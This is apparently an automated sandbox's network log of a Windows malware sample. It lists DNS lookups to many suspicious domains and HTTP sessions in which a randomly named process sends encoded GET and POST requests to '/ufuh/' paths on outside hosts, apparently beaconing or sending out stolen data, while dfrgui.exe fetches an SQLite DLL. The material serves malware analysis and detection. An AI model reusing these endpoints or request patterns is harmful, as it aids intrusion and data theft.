Jun 3, 2024 08:51:22.915952921 CEST	53	54562	8.8.8.8	192.168.2.22
Jun 3, 2024 08:52:04.376864910 CEST	52917	53	192.168.2.22	8.8.8.8
Jun 3, 2024 08:52:04.410151005 CEST	53	52917	8.8.8.8	192.168.2.22
Jun 3, 2024 08:52:09.409198046 CEST	62751	53	192.168.2.22	8.8.8.8
Jun 3, 2024 08:52:09.551565886 CEST	53	62751	8.8.8.8	192.168.2.22
Jun 3, 2024 08:52:14.530303001 CEST	57893	53	192.168.2.22	8.8.8.8
Jun 3, 2024 08:52:14.539757013 CEST	53	57893	8.8.8.8	192.168.2.22
Jun 3, 2024 08:52:14.539944887 CEST	57893	53	192.168.2.22	8.8.8.8
Jun 3, 2024 08:52:14.563009977 CEST	53	57893	8.8.8.8	192.168.2.22
Jun 3, 2024 08:52:17.499135971 CEST	137	137	192.168.2.22	192.168.2.255
Jun 3, 2024 08:52:18.252978086 CEST	137	137	192.168.2.22	192.168.2.255
Jun 3, 2024 08:52:19.017822981 CEST	137	137	192.168.2.22	192.168.2.255
Jun 3, 2024 08:52:25.310306072 CEST	54821	53	192.168.2.22	8.8.8.8
Jun 3, 2024 08:52:25.349744081 CEST	53	54821	8.8.8.8	192.168.2.22
Jun 3, 2024 08:52:25.350526094 CEST	137	137	192.168.2.22	192.168.2.255
Jun 3, 2024 08:52:26.099479914 CEST	137	137	192.168.2.22	192.168.2.255
Jun 3, 2024 08:52:26.863964081 CEST	137	137	192.168.2.22	192.168.2.255
Jun 3, 2024 08:52:28.644006014 CEST	54719	53	192.168.2.22	8.8.8.8
Jun 3, 2024 08:52:28.680414915 CEST	53	54719	8.8.8.8	192.168.2.22
Jun 3, 2024 08:52:28.681338072 CEST	137	137	192.168.2.22	192.168.2.255
Jun 3, 2024 08:52:29.437838078 CEST	137	137	192.168.2.22	192.168.2.255
Jun 3, 2024 08:52:30.202289104 CEST	137	137	192.168.2.22	192.168.2.255
Jun 3, 2024 08:52:31.982541084 CEST	49881	53	192.168.2.22	8.8.8.8
Jun 3, 2024 08:52:32.016232014 CEST	53	49881	8.8.8.8	192.168.2.22
Jun 3, 2024 08:52:32.016937971 CEST	137	137	192.168.2.22	192.168.2.255
Jun 3, 2024 08:52:32.776252031 CEST	137	137	192.168.2.22	192.168.2.255
Jun 3, 2024 08:52:33.540685892 CEST	137	137	192.168.2.22	192.168.2.255
Jun 3, 2024 08:52:35.320673943 CEST	54998	53	192.168.2.22	8.8.8.8
Jun 3, 2024 08:52:35.360717058 CEST	53	54998	8.8.8.8	192.168.2.22
Jun 3, 2024 08:52:35.361443043 CEST	137	137	192.168.2.22	192.168.2.255
Jun 3, 2024 08:52:36.114692926 CEST	137	137	192.168.2.22	192.168.2.255
Jun 3, 2024 08:52:36.879087925 CEST	137	137	192.168.2.22	192.168.2.255
Jun 3, 2024 08:52:42.657195091 CEST	52781	53	192.168.2.22	8.8.8.8
Jun 3, 2024 08:52:42.689258099 CEST	53	52781	8.8.8.8	192.168.2.22
Jun 3, 2024 08:52:56.224983931 CEST	63926	53	192.168.2.22	8.8.8.8
Jun 3, 2024 08:52:56.316521883 CEST	53	63926	8.8.8.8	192.168.2.22
Jun 3, 2024 08:53:09.879434109 CEST	65510	53	192.168.2.22	8.8.8.8
Jun 3, 2024 08:53:09.890044928 CEST	53	65510	8.8.8.8	192.168.2.22
Jun 3, 2024 08:53:15.848084927 CEST	138	138	192.168.2.22	192.168.2.255
Jun 3, 2024 08:53:23.463782072 CEST	62672	53	192.168.2.22	8.8.8.8
Jun 3, 2024 08:53:23.499933004 CEST	53	62672	8.8.8.8	192.168.2.22
Jun 3, 2024 08:53:36.819539070 CEST	56475	53	192.168.2.22	8.8.8.8
Jun 3, 2024 08:53:37.377005100 CEST	53	56475	8.8.8.8	192.168.2.22
Jun 3, 2024 08:53:51.339504957 CEST	49384	53	192.168.2.22	8.8.8.8
Jun 3, 2024 08:53:51.538016081 CEST	53	49384	8.8.8.8	192.168.2.22
Jun 3, 2024 08:54:05.040757895 CEST	54842	53	192.168.2.22	8.8.8.8
Jun 3, 2024 08:54:05.082334995 CEST	53	54842	8.8.8.8	192.168.2.22
Jun 3, 2024 08:54:19.043493986 CEST	58105	53	192.168.2.22	8.8.8.8
Jun 3, 2024 08:54:19.343346119 CEST	53	58105	8.8.8.8	192.168.2.22
Jun 3, 2024 08:54:33.463587046 CEST	64928	53	192.168.2.22	8.8.8.8
Jun 3, 2024 08:54:33.473319054 CEST	53	64928	8.8.8.8	192.168.2.22
Jun 3, 2024 08:54:34.489113092 CEST	57390	53	192.168.2.22	8.8.8.8
Jun 3, 2024 08:54:34.505635023 CEST	53	57390	8.8.8.8	192.168.2.22
Jun 3, 2024 08:54:35.518562078 CEST	58095	53	192.168.2.22	8.8.8.8
Jun 3, 2024 08:54:35.529565096 CEST	53	58095	8.8.8.8	192.168.2.22
Jun 3, 2024 08:54:36.532728910 CEST	54261	53	192.168.2.22	8.8.8.8
Jun 3, 2024 08:54:36.543482065 CEST	53	54261	8.8.8.8	192.168.2.22
Jun 3, 2024 08:54:41.540694952 CEST	60507	53	192.168.2.22	8.8.8.8
Jun 3, 2024 08:54:41.705631971 CEST	53	60507	8.8.8.8	192.168.2.22
Jun 3, 2024 08:54:55.117213011 CEST	50446	53	192.168.2.22	8.8.8.8
Jun 3, 2024 08:54:55.154429913 CEST	53	50446	8.8.8.8	192.168.2.22
Jun 3, 2024 08:55:08.768978119 CEST	55939	53	192.168.2.22	8.8.8.8
Jun 3, 2024 08:55:08.780268908 CEST	53	55939	8.8.8.8	192.168.2.22
Jun 3, 2024 08:55:22.338413000 CEST	49608	53	192.168.2.22	8.8.8.8
Jun 3, 2024 08:55:22.398138046 CEST	53	49608	8.8.8.8	192.168.2.22
Jun 3, 2024 08:55:39.869422913 CEST	61486	53	192.168.2.22	8.8.8.8
Jun 3, 2024 08:55:39.881127119 CEST	53	61486	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jun 3, 2024 08:51:22.822612047 CEST	192.168.2.22	8.8.8.8	0xe30e	Standard query (0)	dukeenergyltd.top	A (IP address)	IN (0x0001)	false
Jun 3, 2024 08:52:04.376864910 CEST	192.168.2.22	8.8.8.8	0xa159	Standard query (0)	www.besthomeincome24.com	A (IP address)	IN (0x0001)	false
Jun 3, 2024 08:52:09.409198046 CEST	192.168.2.22	8.8.8.8	0x848a	Standard query (0)	www.terelprime.com	A (IP address)	IN (0x0001)	false
Jun 3, 2024 08:52:14.530303001 CEST	192.168.2.22	8.8.8.8	0xdc1a	Standard query (0)	www.sqlite.org	A (IP address)	IN (0x0001)	false
Jun 3, 2024 08:52:14.539944887 CEST	192.168.2.22	8.8.8.8	0xdc1a	Standard query (0)	www.sqlite.org	A (IP address)	IN (0x0001)	false
Jun 3, 2024 08:52:25.310306072 CEST	192.168.2.22	8.8.8.8	0x9c74	Standard query (0)	www.99b6q.xyz	A (IP address)	IN (0x0001)	false
Jun 3, 2024 08:52:28.644006014 CEST	192.168.2.22	8.8.8.8	0xbf97	Standard query (0)	www.99b6q.xyz	A (IP address)	IN (0x0001)	false
Jun 3, 2024 08:52:31.982541084 CEST	192.168.2.22	8.8.8.8	0x8a9c	Standard query (0)	www.99b6q.xyz	A (IP address)	IN (0x0001)	false
Jun 3, 2024 08:52:35.320673943 CEST	192.168.2.22	8.8.8.8	0x48cb	Standard query (0)	www.99b6q.xyz	A (IP address)	IN (0x0001)	false
Jun 3, 2024 08:52:42.657195091 CEST	192.168.2.22	8.8.8.8	0x8afc	Standard query (0)	www.kinkynerdspro.blog	A (IP address)	IN (0x0001)	false
Jun 3, 2024 08:52:56.224983931 CEST	192.168.2.22	8.8.8.8	0x1bed	Standard query (0)	www.xn--matfrmn-jxa4m.se	A (IP address)	IN (0x0001)	false
Jun 3, 2024 08:53:09.879434109 CEST	192.168.2.22	8.8.8.8	0x72d5	Standard query (0)	www.primeplay88.org	A (IP address)	IN (0x0001)	false
Jun 3, 2024 08:53:23.463782072 CEST	192.168.2.22	8.8.8.8	0xf9f	Standard query (0)	www.aceautocorp.com	A (IP address)	IN (0x0001)	false
Jun 3, 2024 08:53:36.819539070 CEST	192.168.2.22	8.8.8.8	0x941c	Standard query (0)	www.mrart.co.kr	A (IP address)	IN (0x0001)	false
Jun 3, 2024 08:53:51.339504957 CEST	192.168.2.22	8.8.8.8	0xaed7	Standard query (0)	www.touchclean.top	A (IP address)	IN (0x0001)	false
Jun 3, 2024 08:54:05.040757895 CEST	192.168.2.22	8.8.8.8	0x614e	Standard query (0)	www.ibistradingco.com	A (IP address)	IN (0x0001)	false
Jun 3, 2024 08:54:19.043493986 CEST	192.168.2.22	8.8.8.8	0x4678	Standard query (0)	www.jnkinteractive.co.kr	A (IP address)	IN (0x0001)	false
Jun 3, 2024 08:54:33.463587046 CEST	192.168.2.22	8.8.8.8	0x8c60	Standard query (0)	www.chrisdomond.com	A (IP address)	IN (0x0001)	false
Jun 3, 2024 08:54:34.489113092 CEST	192.168.2.22	8.8.8.8	0x4223	Standard query (0)	www.chrisdomond.com	A (IP address)	IN (0x0001)	false
Jun 3, 2024 08:54:35.518562078 CEST	192.168.2.22	8.8.8.8	0xc3ce	Standard query (0)	www.chrisdomond.com	A (IP address)	IN (0x0001)	false
Jun 3, 2024 08:54:36.532728910 CEST	192.168.2.22	8.8.8.8	0x1c7	Standard query (0)	www.chrisdomond.com	A (IP address)	IN (0x0001)	false
Jun 3, 2024 08:54:41.540694952 CEST	192.168.2.22	8.8.8.8	0x30ab	Standard query (0)	www.riveramayahousing.com	A (IP address)	IN (0x0001)	false
Jun 3, 2024 08:54:55.117213011 CEST	192.168.2.22	8.8.8.8	0xa804	Standard query (0)	www.exclaimer342200213.net	A (IP address)	IN (0x0001)	false
Jun 3, 2024 08:55:08.768978119 CEST	192.168.2.22	8.8.8.8	0x57ac	Standard query (0)	www.platinummedia.info	A (IP address)	IN (0x0001)	false
Jun 3, 2024 08:55:22.338413000 CEST	192.168.2.22	8.8.8.8	0x2cd1	Standard query (0)	www.elenagilherrero.com	A (IP address)	IN (0x0001)	false
Jun 3, 2024 08:55:39.869422913 CEST	192.168.2.22	8.8.8.8	0x1020	Standard query (0)	www.besthomeincome24.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jun 3, 2024 08:51:22.915952921 CEST	8.8.8.8	192.168.2.22	0xe30e	No error (0)	dukeenergyltd.top		188.114.97.3	A (IP address)	IN (0x0001)	false
Jun 3, 2024 08:51:22.915952921 CEST	8.8.8.8	192.168.2.22	0xe30e	No error (0)	dukeenergyltd.top		188.114.96.3	A (IP address)	IN (0x0001)	false
Jun 3, 2024 08:52:04.410151005 CEST	8.8.8.8	192.168.2.22	0xa159	Name error (3)	www.besthomeincome24.com	none	none	A (IP address)	IN (0x0001)	false
Jun 3, 2024 08:52:09.551565886 CEST	8.8.8.8	192.168.2.22	0x848a	No error (0)	www.terelprime.com		66.96.161.166	A (IP address)	IN (0x0001)	false
Jun 3, 2024 08:52:14.539757013 CEST	8.8.8.8	192.168.2.22	0xdc1a	No error (0)	www.sqlite.org		45.33.6.223	A (IP address)	IN (0x0001)	false
Jun 3, 2024 08:52:14.563009977 CEST	8.8.8.8	192.168.2.22	0xdc1a	No error (0)	www.sqlite.org		45.33.6.223	A (IP address)	IN (0x0001)	false
Jun 3, 2024 08:52:25.349744081 CEST	8.8.8.8	192.168.2.22	0x9c74	Name error (3)	www.99b6q.xyz	none	none	A (IP address)	IN (0x0001)	false
Jun 3, 2024 08:52:28.680414915 CEST	8.8.8.8	192.168.2.22	0xbf97	Name error (3)	www.99b6q.xyz	none	none	A (IP address)	IN (0x0001)	false
Jun 3, 2024 08:52:32.016232014 CEST	8.8.8.8	192.168.2.22	0x8a9c	Name error (3)	www.99b6q.xyz	none	none	A (IP address)	IN (0x0001)	false
Jun 3, 2024 08:52:35.360717058 CEST	8.8.8.8	192.168.2.22	0x48cb	Name error (3)	www.99b6q.xyz	none	none	A (IP address)	IN (0x0001)	false
Jun 3, 2024 08:52:42.689258099 CEST	8.8.8.8	192.168.2.22	0x8afc	No error (0)	www.kinkynerdspro.blog		54.38.220.85	A (IP address)	IN (0x0001)	false
Jun 3, 2024 08:52:56.316521883 CEST	8.8.8.8	192.168.2.22	0x1bed	No error (0)	www.xn--matfrmn-jxa4m.se		194.9.94.86	A (IP address)	IN (0x0001)	false
Jun 3, 2024 08:52:56.316521883 CEST	8.8.8.8	192.168.2.22	0x1bed	No error (0)	www.xn--matfrmn-jxa4m.se		194.9.94.85	A (IP address)	IN (0x0001)	false
Jun 3, 2024 08:53:09.890044928 CEST	8.8.8.8	192.168.2.22	0x72d5	No error (0)	www.primeplay88.org	parkingpage.namecheap.com		CNAME (Canonical name)	IN (0x0001)	false
Jun 3, 2024 08:53:09.890044928 CEST	8.8.8.8	192.168.2.22	0x72d5	No error (0)	parkingpage.namecheap.com		91.195.240.19	A (IP address)	IN (0x0001)	false
Jun 3, 2024 08:53:23.499933004 CEST	8.8.8.8	192.168.2.22	0xf9f	No error (0)	www.aceautocorp.com	aceautocorp.com		CNAME (Canonical name)	IN (0x0001)	false
Jun 3, 2024 08:53:23.499933004 CEST	8.8.8.8	192.168.2.22	0xf9f	No error (0)	aceautocorp.com		198.12.241.35	A (IP address)	IN (0x0001)	false
Jun 3, 2024 08:53:37.377005100 CEST	8.8.8.8	192.168.2.22	0x941c	No error (0)	www.mrart.co.kr	mrart.co.kr		CNAME (Canonical name)	IN (0x0001)	false
Jun 3, 2024 08:53:37.377005100 CEST	8.8.8.8	192.168.2.22	0x941c	No error (0)	mrart.co.kr		183.111.183.31	A (IP address)	IN (0x0001)	false
Jun 3, 2024 08:53:51.538016081 CEST	8.8.8.8	192.168.2.22	0xaed7	No error (0)	www.touchclean.top		67.223.117.189	A (IP address)	IN (0x0001)	false
Jun 3, 2024 08:54:05.082334995 CEST	8.8.8.8	192.168.2.22	0x614e	No error (0)	www.ibistradingco.com	www.ibistradingco.com.cdn.hstgr.net		CNAME (Canonical name)	IN (0x0001)	false
Jun 3, 2024 08:54:05.082334995 CEST	8.8.8.8	192.168.2.22	0x614e	No error (0)	www.ibistradingco.com.cdn.hstgr.net		89.116.109.159	A (IP address)	IN (0x0001)	false
Jun 3, 2024 08:54:19.343346119 CEST	8.8.8.8	192.168.2.22	0x4678	No error (0)	www.jnkinteractive.co.kr	jnkinteractive.co.kr		CNAME (Canonical name)	IN (0x0001)	false
Jun 3, 2024 08:54:19.343346119 CEST	8.8.8.8	192.168.2.22	0x4678	No error (0)	jnkinteractive.co.kr		183.111.183.31	A (IP address)	IN (0x0001)	false
Jun 3, 2024 08:54:33.473319054 CEST	8.8.8.8	192.168.2.22	0x8c60	Name error (3)	www.chrisdomond.com	none	none	A (IP address)	IN (0x0001)	false
Jun 3, 2024 08:54:34.505635023 CEST	8.8.8.8	192.168.2.22	0x4223	Name error (3)	www.chrisdomond.com	none	none	A (IP address)	IN (0x0001)	false
Jun 3, 2024 08:54:35.529565096 CEST	8.8.8.8	192.168.2.22	0xc3ce	Name error (3)	www.chrisdomond.com	none	none	A (IP address)	IN (0x0001)	false
Jun 3, 2024 08:54:36.543482065 CEST	8.8.8.8	192.168.2.22	0x1c7	Name error (3)	www.chrisdomond.com	none	none	A (IP address)	IN (0x0001)	false
Jun 3, 2024 08:54:41.705631971 CEST	8.8.8.8	192.168.2.22	0x30ab	No error (0)	www.riveramayahousing.com		208.91.197.13	A (IP address)	IN (0x0001)	false
Jun 3, 2024 08:54:55.154429913 CEST	8.8.8.8	192.168.2.22	0xa804	No error (0)	www.exclaimer342200213.net	exclaimer342200213.net		CNAME (Canonical name)	IN (0x0001)	false
Jun 3, 2024 08:54:55.154429913 CEST	8.8.8.8	192.168.2.22	0xa804	No error (0)	exclaimer342200213.net		84.33.215.91	A (IP address)	IN (0x0001)	false
Jun 3, 2024 08:55:08.780268908 CEST	8.8.8.8	192.168.2.22	0x57ac	No error (0)	www.platinummedia.info		172.67.182.131	A (IP address)	IN (0x0001)	false
Jun 3, 2024 08:55:08.780268908 CEST	8.8.8.8	192.168.2.22	0x57ac	No error (0)	www.platinummedia.info		104.21.51.161	A (IP address)	IN (0x0001)	false
Jun 3, 2024 08:55:22.398138046 CEST	8.8.8.8	192.168.2.22	0x2cd1	No error (0)	www.elenagilherrero.com	www.elenagilherrero.com.cdn.hstgr.net		CNAME (Canonical name)	IN (0x0001)	false
Jun 3, 2024 08:55:22.398138046 CEST	8.8.8.8	192.168.2.22	0x2cd1	No error (0)	www.elenagilherrero.com.cdn.hstgr.net		93.127.187.187	A (IP address)	IN (0x0001)	false
Jun 3, 2024 08:55:39.881127119 CEST	8.8.8.8	192.168.2.22	0x1020	Name error (3)	www.besthomeincome24.com	none	none	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

dukeenergyltd.top

www.terelprime.com

www.sqlite.org

www.kinkynerdspro.blog

www.xn--matfrmn-jxa4m.se

www.primeplay88.org

www.aceautocorp.com

www.mrart.co.kr

www.touchclean.top

www.ibistradingco.com

www.jnkinteractive.co.kr

www.riveramayahousing.com

www.exclaimer342200213.net

www.platinummedia.info

www.elenagilherrero.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.22	49162	66.96.161.166	80	2580	C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe

Timestamp	Bytes transferred	Direction	Data
Jun 3, 2024 08:52:09.561023951 CEST	463	OUT	GET /ufuh/?ZXdp=YGhnx96XAVFPN8tw+HM+ERdVPj6qvRaWteKDUnkDVIOF49Ku923zFB1LHsiTDOOJR3oxDyM0OU58BlZHZbBCNvk4uEj8jDacBIFePGWcdtykoT8enibuKQ6eq0+l&7jsp7=zz9xHbtX HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: close Host: www.terelprime.com User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
Jun 3, 2024 08:52:10.243381977 CEST	1087	IN	HTTP/1.1 404 Not Found Date: Mon, 03 Jun 2024 06:52:10 GMT Content-Type: text/html Content-Length: 867 Connection: close Server: Apache Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT Accept-Ranges: bytes Age: 0 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 [TRUNCATED] Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; } body{ margin:0; border: 0; padding: 0; } </style> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script> <script type="text/javascript" language="JavaScript"> var url = 'http://www.searchvity.com/?dn=' + document.domain + '&pid=9POL6F2H4'; $(document).ready(function() { $('#ad_frame').attr('src', url); }); </script> </head> <body> <iframe id="ad_frame" src="http://www.searchvity.com/" frameborder="0" scrolling="no"> ... browser does not support iframe's --> </iframe> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.22	49163	45.33.6.223	80	1688	C:\Windows\SysWOW64\dfrgui.exe

Timestamp	Bytes transferred	Direction	Data
Jun 3, 2024 08:52:14.579103947 CEST	248	OUT	GET /2022/sqlite-dll-win32-x86-3390000.zip HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36 Host: www.sqlite.org Connection: Keep-Alive Cache-Control: no-cache
Jun 3, 2024 08:52:15.169913054 CEST	249	IN	HTTP/1.1 200 OK Connection: keep-alive Date: Mon, 03 Jun 2024 06:52:15 GMT Last-Modified: Wed, 13 Jul 2022 19:46:17 GMT Cache-Control: max-age=120 ETag: "m62cf2109s8b560" Content-type: application/zip; charset=utf-8 Content-length: 570720
Jun 3, 2024 08:52:15.169945002 CEST	1236	IN	Data Raw: 50 4b 03 04 14 00 00 00 08 00 1c b3 d9 54 87 d9 bd 2c a0 06 00 00 d6 1c 00 00 0b 00 1c 00 73 71 6c 69 74 65 33 2e 64 65 66 55 54 09 00 03 c7 28 b7 62 c7 28 b7 62 75 78 0b 00 01 04 e8 03 00 00 04 e8 03 00 00 85 98 c9 b2 dd 26 10 40 f7 fe 1b fb a5 Data Ascii: PKT,sqlite3.defUT(b(bux&@\JN$$@f>pE7 g/zo_+s\|rNC;M7Pn5j-QP0J=oS&sMeJ#*[4l
Jun 3, 2024 08:52:15.169955969 CEST	212	IN	Data Raw: 12 12 3f 73 0e ba 8e 9a 9e 37 bc 4b c1 60 3b 8b e1 8b 61 f1 f7 53 4a da bb 93 92 10 7b 53 1a 62 27 15 cb 52 b3 d4 42 d5 34 dc 3d 0d ea 43 4f 6e f9 7e b8 57 8d 3b 05 e7 2d 4a fd ec 85 f2 07 73 d3 d6 31 d3 9b 77 ed 90 2e 4c 90 d5 b0 07 e7 60 df e0 Data Ascii: ?s7K`;aSJ{Sb'RB4=COn~W;-Js1w.L`;hKWF:jPr{Z&Dc<!<C=ocGzEqGlh+1);tBXV=ZqXLA@W:2E]DfZ''/
Jun 3, 2024 08:52:15.170053005 CEST	1236	IN	Data Raw: fc 1e 8e a1 f4 09 93 27 e6 db 36 a4 15 46 fc cc 71 eb 9a 1e de 6d e1 33 c4 27 1e e5 8f 0a 5b b6 14 35 9c 76 d0 20 d7 2f 85 84 22 bf 70 86 4d 9c 8e 70 a3 02 40 d9 85 77 5e 95 dc 53 45 1f 28 93 7b 2d 87 37 62 18 b5 0e 5a 13 46 2b 4e 20 d0 56 93 f1 Data Ascii: '6Fqm3'[5v /"pMp@w^SE({-7bZF+N V]hi5<B!JOUY8UIYS:}D_e.7QRxj]p&UX$@Z\_MzN"v=D*T=fPE,`['lN/a$$
Jun 3, 2024 08:52:15.170090914 CEST	1236	IN	Data Raw: d9 17 b4 a1 fa 92 41 ff 60 49 b3 21 a9 a6 47 a8 3e 88 b1 cf fd 16 41 c4 24 68 77 6a 6b 6e 0a 8f 44 8a ac 4a 31 c3 77 32 b1 a5 84 3b e4 7e 8b 1c 83 8d e6 a0 ca 5a 5f b1 7a ef 74 04 43 df 0c 87 c3 e3 f5 7f 1b fb 18 bb fc bd 3e e8 f2 20 69 11 b3 df Data Ascii: A`I!G>A$hwjknDJ1w2;~Z_ztC> i6QoAiUy\&(\|;g7_")sDCkB#r[clzlBP~;mlR/30D=yx-~8f~E9hi!N23jE8bh3"
Jun 3, 2024 08:52:15.170182943 CEST	1236	IN	Data Raw: fb cb fe 52 a1 be 1e 7f d2 2e 49 26 b7 da bd 86 b4 ad 8d 4c 0b ea c5 1d 2c d1 11 ac e9 14 5e 0f 0e 75 a9 16 1c 9f 12 f5 0f 6c 43 d7 57 31 4c 83 22 00 a4 3e 18 a4 68 d8 65 35 9d 0c 4c cc 79 24 b0 84 ab 09 56 cd 83 b4 70 45 86 50 cf c1 b0 09 f5 7e Data Ascii: R.I&L,^ulCW1L">he5Ly$VpEP~;$P~quFl=bRj;pyGH'i34L('V!xYzTSHci]6_?+ AzlX6\|H!&.G:)mL]Sg
Jun 3, 2024 08:52:15.170241117 CEST	636	IN	Data Raw: e4 05 d8 ab 40 84 76 da 6a 03 19 01 9c af 52 6c 20 b7 d6 ac 0a a6 e5 e9 bc f3 60 d5 45 e8 40 13 ec a0 8c 89 74 74 92 4f 5c 42 7d 7e 18 b6 83 69 fa 6e c6 1d 78 be f3 4f 5b be f9 73 f5 22 ee a6 da 78 c3 9e 40 8b 2d e4 24 b0 85 37 90 0e 52 30 a0 34 Data Ascii: @vjRl `E@ttO\B}~inxO[s"x@-$7R04Bi&2L2MF2pP) MjuFz(:`6Ug}sY^k7'xa Am?pxXH+caiD-T--l4ufhT4u?<r
Jun 3, 2024 08:52:15.170252085 CEST	1236	IN	Data Raw: c4 2c fa 4a 4c d6 57 62 72 bf 12 93 0f 31 4b 33 ad 9b be ad 33 87 cd 74 19 4a 2d d3 49 87 a3 73 e8 12 7d 42 b6 d4 f4 48 2a 10 95 87 77 64 be 25 18 0c e5 b3 80 40 1c 6d 54 4c f2 f9 38 a1 3e d7 64 39 36 2c f7 72 6a 3a e9 08 6c e4 3e f0 61 0b 3b f7 Data Ascii: ,JLWbr1K33tJ-Is}BH*wd%@mTL8>d96,rj:l>a;d}33-%!05GmMrml[,C ?\|;1=3Nd"/Ao'lJQA\&9}(C!VM')LuKd"q3I)~df$lo.ty1Qw
Jun 3, 2024 08:52:15.170314074 CEST	212	IN	Data Raw: 37 90 91 80 6d 90 06 60 2e c4 d1 7b e8 1a 1e fa b9 07 84 ee a0 38 9b 1a e5 26 33 d7 c5 b5 d0 9c 2f b8 01 ae d9 e9 1d 28 57 d5 27 68 02 44 93 23 a4 ad 51 b1 37 7e 6a e7 5a 49 db 8e f3 d0 24 c3 ad f0 cf c0 9d 6b 0c 99 1b 7b cd dc 30 d7 c6 72 92 56 Data Ascii: 7m`.{8&3/(W'hD#Q7~jZI$k{0rV`!;wFZoE"lbn$qW;lF"a8+~PerE"vpb:yA\zz5eN(,lL^2:3g
Jun 3, 2024 08:52:15.170344114 CEST	1236	IN	Data Raw: 48 af 13 b7 ef 1e 4f 30 e0 1c 54 a7 66 ca 6f a1 18 15 4b d8 2f 2d 38 4e 38 54 14 67 69 13 13 f6 d6 4f 2a e6 e0 cc 94 66 d0 5a ac 1c ea ea fc 5b a0 29 a6 da 42 5e a8 77 f1 51 bb 13 36 cb 95 85 cc d1 6f 60 70 5b dc 09 13 9a 74 9c 6a bf 52 98 ca 35 Data Ascii: HO0TfoK/-8N8TgiO*fZ[)B^wQ6o`p[tjR52Zx rB1q0jtrLqy,r!x7qtE=[\LBt`6g spI3d %8_J%Sq+rw#pB\gOUh(PC-'
Jun 3, 2024 08:52:15.174916983 CEST	1236	IN	Data Raw: 80 f3 88 d8 ef 6c 15 95 d5 64 f8 71 ad 4a c2 de fc 5c ff 53 dc 48 59 ab eb 6e 24 e4 e4 40 19 5d 9e 9f b7 b4 b6 30 57 d8 db 49 57 ed ac 28 23 f9 79 34 5f 24 85 62 09 cd ce 0f 5d 18 8c 2c 10 d2 1c c8 9a 8e ab 64 19 08 b4 16 dc 0e 6d 3f e0 c6 f4 4d Data Ascii: ldqJ\SHYn$@]0WIW(#y4_$b],dm?M7\VFEeEYMO=&5lX3#G)d4,t<Lf9dDK>r a=1wsMvPwfzMtgRF<_t9@cU5Lj<Kb

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.22	49164	54.38.220.85	80	2580	C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe

Timestamp	Bytes transferred	Direction	Data
Jun 3, 2024 08:52:42.695924997 CEST	2472	OUT	POST /ufuh/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Length: 2161 Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Host: www.kinkynerdspro.blog Origin: http://www.kinkynerdspro.blog Referer: http://www.kinkynerdspro.blog/ufuh/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36 Data Raw: 5a 58 64 70 3d 53 38 6f 6e 68 39 36 57 74 75 52 2f 45 32 71 62 32 65 4c 53 47 74 5a 47 78 57 6e 4b 49 33 78 68 48 77 41 32 4b 4e 45 67 65 67 34 59 49 54 43 56 57 45 79 7a 75 4c 39 47 75 77 37 69 54 6e 77 56 72 2f 78 59 6b 6c 6d 54 6f 62 67 6e 4b 59 70 51 57 61 57 67 39 76 57 63 4f 51 68 57 38 5a 67 55 73 4f 52 72 58 69 